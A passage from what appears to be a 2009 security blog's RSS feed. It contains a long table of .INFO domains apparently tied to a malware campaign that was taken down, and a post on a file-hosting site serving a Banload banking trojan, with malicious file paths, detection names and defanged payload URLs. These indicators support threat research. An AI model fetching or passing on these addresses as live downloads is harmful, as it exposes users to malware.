<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC9.INFO<span> </span></td>
<td>BM5.INFO<span> </span></td>
<td>EP8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD0.INFO<span> </span></td>
<td>BM8.INFO<span> </span></td>
<td>EQ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD4.INFO<span> </span></td>
<td>BN0.INFO<span> </span></td>
<td>EQ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD5.INFO<span> </span></td>
<td>BN3.INFO<span> </span></td>
<td>ER9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD6.INFO<span> </span></td>
<td>BN5.INFO<span> </span></td>
<td>ES7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD7.INFO<span> </span></td>
<td>BN7.INFO<span> </span></td>
<td>ES8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD8.INFO<span> </span></td>
<td>BN8.INFO<span> </span></td>
<td>ES9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GF3.INFO<span> </span></td>
<td>BP0.INFO<span> </span></td>
<td>EU0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH4.INFO<span> </span></td>
<td>BP5.INFO<span> </span></td>
<td>EV9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH5.INFO<span> </span></td>
<td>BP6.INFO<span> </span></td>
<td>EW0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH6.INFO<span> </span></td>
<td>BP7.INFO<span> </span></td>
<td>EW4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH7.INFO<span> </span></td>
<td>BP8.INFO<span> </span></td>
<td>EY0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI0.INFO<span> </span></td>
<td>BQ0.INFO<span> </span></td>
<td>EZ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI3.INFO<span> </span></td>
<td>BQ2.INFO<span> </span></td>
<td>EZ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI6.INFO<span> </span></td>
<td>BQ3.INFO<span> </span></td>
<td>FA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI8.INFO<span> </span></td>
<td>BQ4.INFO<span> </span></td>
<td>FC0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ0.INFO<span> </span></td>
<td>BQ5.INFO<span> </span></td>
<td>FC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ7.INFO<span> </span></td>
<td>BQ6.INFO<span> </span></td>
<td>FC7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ8.INFO<span> </span></td>
<td>BQ7.INFO<span> </span></td>
<td>FC9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ9.INFO<span> </span></td>
<td>BQ8.INFO<span> </span></td>
<td>FD0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK0.INFO<span> </span></td>
<td>BQ9.INFO<span> </span></td>
<td>FD5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK3.INFO<span> </span></td>
<td>BR5.INFO<span> </span></td>
<td>FD8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK5.INFO<span> </span></td>
<td>BR6.INFO<span> </span></td>
<td>FD9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK6.INFO<span> </span></td>
<td>BR7.INFO<span> </span></td>
<td>FE0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK8.INFO<span> </span></td>
<td>BR9.INFO<span> </span></td>
<td>FE4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL3.INFO<span> </span></td>
<td>BS3.INFO<span> </span></td>
<td>FE7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL4.INFO<span> </span></td>
<td>BS5.INFO<span> </span></td>
<td>FG0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL9.INFO<span> </span></td>
<td>BT0.INFO<span> </span></td>
<td>FG3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM8.INFO<span> </span></td>
<td>BU0.INFO<span> </span></td>
<td>FG5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM9.INFO<span> </span></td>
<td>BU9.INFO<span> </span></td>
<td>FG8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN0.INFO<span> </span></td>
<td>BV0.INFO<span> </span></td>
<td>FH0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN5.INFO<span> </span></td>
<td>BV2.INFO<span> </span></td>
<td>FH4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN6.INFO<span> </span></td>
<td>BV5.INFO<span> </span></td>
<td>FH5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN7.INFO<span> </span></td>
<td>BV7.INFO<span> </span></td>
<td>FH6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN9.INFO<span> </span></td>
<td>BV8.INFO<span> </span></td>
<td>FH7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GP8.INFO<span> </span></td>
<td>BV9.INFO<span> </span></td>
<td>FH8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX2.INFO<span> </span></td>
<td>WGREATDREAM.COM<span> </span></td>
<td>FH9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX7.INFO<span> </span></td>
<td>GP0.INFO<span> </span></td>
<td>FI4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX9.INFO<span> </span></td>
<td>GQ0.INFO<span> </span></td>
<td>FJ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BY5.INFO<span> </span></td>
<td>GQ2.INFO<span> </span></td>
<td>FJ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BZ9.INFO<span> </span></td>
<td>GQ3.INFO<span> </span></td>
<td>FJ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB0.INFO<span> </span></td>
<td>GQ4.INFO<span> </span></td>
<td>FJ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB6.INFO<span> </span></td>
<td>GQ5.INFO<span> </span></td>
<td>FJ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE3.INFO<span> </span></td>
<td>GQ9.INFO<span> </span></td>
<td>FJ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE7.INFO<span> </span></td>
<td>GR6.INFO<span> </span></td>
<td>FJ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF0.INFO<span> </span></td>
<td>GR9.INFO<span> </span></td>
<td>FJ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF3.INFO<span> </span></td>
<td>GS0.INFO<span> </span></td>
<td>FJ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF4.INFO<span> </span></td>
<td>GS3.INFO<span> </span></td>
<td>FK2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF5.INFO<span> </span></td>
<td>GS6.INFO<span> </span></td>
<td>JD0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF6.INFO<span> </span></td>
<td>GS9.INFO<span> </span></td>
<td>JD6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF7.INFO<span> </span></td>
<td>GU0.INFO<span> </span></td>
<td>JD7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CG3.INFO<span> </span></td>
<td>GU4.INFO<span> </span></td>
<td>JD9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CI0.INFO<span> </span></td>
<td>GV0.INFO<span> </span></td>
<td>JE2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CJ0.INFO<span> </span></td>
<td>GV2.INFO<span> </span></td>
<td>JE4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CJ3.INFO<span> </span></td>
<td>GV3.INFO<span> </span></td>
<td>JF0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CJ8.INFO<span> </span></td>
<td>GV4.INFO<span> </span></td>
<td>JF2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CL0.INFO<span> </span></td>
<td>GV5.INFO<span> </span></td>
<td>JF3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CL5.INFO<span> </span></td>
<td>GV9.INFO<span> </span></td>
<td>JG0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CL9.INFO<span> </span></td>
<td>GW0.INFO<span> </span></td>
<td>JG2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CM9.INFO<span> </span></td>
<td>GX0.INFO<span> </span></td>
<td>JG3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CO0.INFO<span> </span></td>
<td>GX2.INFO<span> </span></td>
<td>JG7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CP0.INFO<span> </span></td>
<td>GX4.INFO<span> </span></td>
<td>JG8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CP5.INFO<span> </span></td>
<td>GX5.INFO<span> </span></td>
<td>JG9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CP7.INFO<span> </span></td>
<td>GX6.INFO<span> </span></td>
<td>JH0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ0.INFO<span> </span></td>
<td>GY0.INFO<span> </span></td>
<td>JH4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ5.INFO<span> </span></td>
<td>GY2.INFO<span> </span></td>
<td>JH5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ7.INFO<span> </span></td>
<td>GY4.INFO<span> </span></td>
<td>JH7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ8.INFO<span> </span></td>
<td>GY5.INFO<span> </span></td>
<td>JI0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ9.INFO<span> </span></td>
<td>GY6.INFO<span> </span></td>
<td>JI1.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CS0.INFO<span> </span></td>
<td>GY7.INFO<span> </span></td>
<td>JI2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CS7.INFO<span> </span></td>
<td>GY9.INFO<span> </span></td>
<td>JI7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CT0.INFO<span> </span></td>
<td>HB7.INFO<span> </span></td>
<td>JI9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CT6.INFO<span> </span></td>
<td>HB8.INFO<span> </span></td>
<td>JK7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CT8.INFO<span> </span></td>
<td>HC0.INFO<span> </span></td>
<td>JK8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CU3.INFO<span> </span></td>
<td>HC4.INFO<span> </span></td>
<td>JL2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CU4.INFO<span> </span></td>
<td>HC8.INFO<span> </span></td>
<td>JL3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CU5.INFO<span> </span></td>
<td>HD0.INFO<span> </span></td>
<td>JL4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CV0.INFO<span> </span></td>
<td>HE4.INFO<span> </span></td>
<td>JL5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CV8.INFO<span> </span></td>
<td>HE5.INFO<span> </span></td>
<td>JL7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CV9.INFO<span> </span></td>
<td>HE7.INFO<span> </span></td>
<td>JL9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW0.INFO<span> </span></td>
<td>HF0.INFO<span> </span></td>
<td>JM0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW4.INFO<span> </span></td>
<td>HF6.INFO<span> </span></td>
<td>JM3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW5.INFO<span> </span></td>
<td>HF7.INFO<span> </span></td>
<td>JM6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW8.INFO<span> </span></td>
<td>HF8.INFO<span> </span></td>
<td>JM7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW9.INFO<span> </span></td>
<td>HF9.INFO<span> </span></td>
<td>JN2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CX0.INFO<span> </span></td>
<td>HG3.INFO<span> </span></td>
<td>JN7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CX5.INFO<span> </span></td>
<td>HG4.INFO<span> </span></td>
<td>JN8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CX6.INFO<span> </span></td>
<td>HG5.INFO<span> </span></td>
<td>JN9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY2.INFO<span> </span></td>
<td>HG6.INFO<span> </span></td>
<td>JO0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY3.INFO<span> </span></td>
<td>HG8.INFO<span> </span></td>
<td>JQ1.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY6.INFO<span> </span></td>
<td>HG9.INFO<span> </span></td>
<td>JQ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY7.INFO<span> </span></td>
<td>HJ2.INFO<span> </span></td>
<td>JQ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CZ0.INFO<span> </span></td>
<td>HJ3.INFO<span> </span></td>
<td>JQ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CZ7.INFO<span> </span></td>
<td>HJ5.INFO<span> </span></td>
<td>JQ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CZ9.INFO<span> </span></td>
<td>HJ6.INFO<span> </span></td>
<td>JQ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DA3.INFO<span> </span></td>
<td>HJ7.INFO<span> </span></td>
<td>JQ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DA6.INFO<span> </span></td>
<td>HJ8.INFO<span> </span></td>
<td>JQ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DA7.INFO<span> </span></td>
<td>HJ9.INFO<span> </span></td>
<td>JR0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DB5.INFO<span> </span></td>
<td>HK0.INFO<span> </span></td>
<td>JS3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DB6.INFO<span> </span></td>
<td>HK3.INFO<span> </span></td>
<td>JS4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE4.INFO<span> </span></td>
<td>HK4.INFO<span> </span></td>
<td>JS5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE5.INFO<span> </span></td>
<td>HL0.INFO<span> </span></td>
<td>JS8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE6.INFO<span> </span></td>
<td>HL6.INFO<span> </span></td>
<td>JS9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE8.INFO<span> </span></td>
<td>HL9.INFO<span> </span></td>
<td>JT0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DF5.INFO<span> </span></td>
<td>HM4.INFO<span> </span></td>
<td>JT3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DF6.INFO<span> </span></td>
<td>HN0.INFO<span> </span></td>
<td>JT4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DG0.INFO<span> </span></td>
<td>HN3.INFO<span> </span></td>
<td>JT5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DH3.INFO<span> </span></td>
<td>HN4.INFO<span> </span></td>
<td>JT9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DH9.INFO<span> </span></td>
<td>HN5.INFO<span> </span></td>
<td>JU0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI0.INFO<span> </span></td>
<td>HN6.INFO<span> </span></td>
<td>JU2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI3.INFO<span> </span></td>
<td>HN9.INFO<span> </span></td>
<td>JV0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI4.INFO<span> </span></td>
<td>HO0.INFO<span> </span></td>
<td>JV3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI8.INFO<span> </span></td>
<td>HP0.INFO<span> </span></td>
<td>JV4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DJ3.INFO<span> </span></td>
<td>HR6.INFO<span> </span></td>
<td>JV5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DJ7.INFO<span> </span></td>
<td>HS0.INFO<span> </span></td>
<td>JV6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK0.INFO<span> </span></td>
<td>HS7.INFO<span> </span></td>
<td>JV8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK5.INFO<span> </span></td>
<td>HS8.INFO<span> </span></td>
<td>JW4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK7.INFO<span> </span></td>
<td>HS9.INFO<span> </span></td>
<td>JW7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK8.INFO<span> </span></td>
<td>HT6.INFO<span> </span></td>
<td>JW8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DL0.INFO<span> </span></td>
<td>HU0.INFO<span> </span></td>
<td>JW9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DM0.INFO<span> </span></td>
<td>HU3.INFO<span> </span></td>
<td>JX1.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DM4.INFO<span> </span></td>
<td>HU4.INFO<span> </span></td>
<td>JX2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP0.INFO<span> </span></td>
<td>HU6.INFO<span> </span></td>
<td>JX3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP3.INFO<span> </span></td>
<td>HU7.INFO<span> </span></td>
<td>JX5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP6.INFO<span> </span></td>
<td>HV0.INFO<span> </span></td>
<td>JX8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP7.INFO<span> </span></td>
<td>HW4.INFO<span> </span></td>
<td>JY0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DQ0.INFO<span> </span></td>
<td>HW6.INFO<span> </span></td>
<td>JY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DQ2.INFO<span> </span></td>
<td>HW7.INFO<span> </span></td>
<td>JY4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DR0.INFO<span> </span></td>
<td>HW8.INFO<span> </span></td>
<td>JY5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DS7.INFO<span> </span></td>
<td>HX3.INFO<span> </span></td>
<td>JY6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT3.INFO<span> </span></td>
<td>HX5.INFO<span> </span></td>
<td>JY7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT5.INFO<span> </span></td>
<td>HX6.INFO<span> </span></td>
<td>JY9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT6.INFO<span> </span></td>
<td>HX7.INFO<span> </span></td>
<td>JZ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT7.INFO<span> </span></td>
<td>HX9.INFO<span> </span></td>
<td>JZ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT8.INFO<span> </span></td>
<td>KD0.INFO<span> </span></td>
<td>JZ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT9.INFO<span> </span></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>One Click Hosting Spreads Banking Trojan</title>
		<link>http://www.martinsecurity.net/2009/07/02/one-click-hosting-spreads-banking-trojan/</link>
		<comments>http://www.martinsecurity.net/2009/07/02/one-click-hosting-spreads-banking-trojan/#comments</comments>
		<pubDate>Thu, 02 Jul 2009 23:59:02 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[banker]]></category>
		<category><![CDATA[banking trojan]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=342</guid>
		<description><![CDATA[While this is not totally new, I only recently came across my first event involving a one click host serving  malware. What is one click hosting? These are providers which you have probably heard of before such as RapidShare, Megaupload, yousendit and many many more. Wikipedia has a listing of many of them. These providers [...]]]></description>
			<content:encoded><![CDATA[<p>While this is not totally new, I only recently came across my first event involving a one click host serving  malware. What is one click hosting? These are providers which you have probably heard of before such as RapidShare, Megaupload, yousendit and many many more. Wikipedia has <a href="http://en.wikipedia.org/wiki/File_hosting_service" target="_blank">a listing</a> of many of them. These providers allow you to share files  via HTTP for free or a small fee for premium service.</p>
<p>In the last few weeks (beginning June 17th), a particular OCH (one click host) hotlinkfiles.com began serving up malware. The host uses AV according to a March 25th, 2008 post on their website:</p>
<p>&#8220;Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.&#8221;</p>
<p>The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:</p>
<table style="border-collapse: collapse; width: 307pt;" border="0" cellspacing="0" cellpadding="0" width="409">
<col style="width: 116pt;" width="154"></col>
<col style="width: 191pt;" width="255"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 116pt;" width="154" height="17">hotlinkfiles.com</td>
<td style="width: 191pt;" width="255">/files/2607508_gs2zp/eudenoite1.scr</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17">premium.hotlinkfiles.com</td>
<td>/files/2619000_idqqh/fotosanexadas.scryh</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17">hotlinkfiles.com</td>
<td>/files/2637460_lnqnl/DSC_804.jpg.scr</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17">premium.hotlinkfiles.com</td>
<td>/files/2645684_c2awa/fotosanexadas.scr</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17">hotlinkfiles.com</td>
<td>/files/2645758_i45ka/DSC_805.jpg.scr</td>
</tr>
</tbody>
</table>
<p>Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought an account or has used a account stolen from an unsuspecting victim.</p>
<p>Detection for the first stage download is pretty good at 30/41, most vendors detect it as Banload which is also classed as a banking trojan. <a title="banload variant" href="http://www.virustotal.com/analisis/9af80939bdd78d377e02676795cbad43033b5015f6014500beaa3bb75de58038-1246565040" target="_blank">[Virustotal1]</a> <a title="banload malware" href="http://www.virustotal.com/analisis/3727d32d8d98d1ef78bb6b4537aa3cb35071fb255d3246881bfb8c0a22c0b6c6-1246565055" target="_blank">[Virustotal2]</a></p>
<p>Downloader.Banload.AMIX<br />
Win-Trojan/Banload.71680.O<br />
Win32/TrojanDownloader.Banload.BDA</p>
<p>PWS-Banker!ee<br />
Mal_Banker</p>
<p>The file downloads several more payloads which are all executables <a title="Threat Expert Banload" href="http://www.threatexpert.com/report.aspx?md5=cee657747902a498f438d1b402b31619" target="_blank">[Threatexpert]</a> however the detection rate is terrible on them with most being detected by 0/41 vendors. <a href="http://www.virustotal.com/analisis/76d6a837b503eeabdf39abe385ee57bb0a91c80939cd481373c8488c49eb7648-1246566431" target="_blank">[Virustotal]</a></p>
<p>hxxp://gay24&#215;01.hpg.ig.com.br/ree1.html<br />
hxxp://gay24&#215;01.hpg.ig.com.br/ree2.html<br />
hxxp://gay24&#215;02.hpg.ig.com.br/nl2.html<br />
hxxp://gay24&#215;02.hpg.ig.com.br/nl3.html<br />
hxxp://gay24&#215;02.hpg.ig.com.br/nl4.html<br />
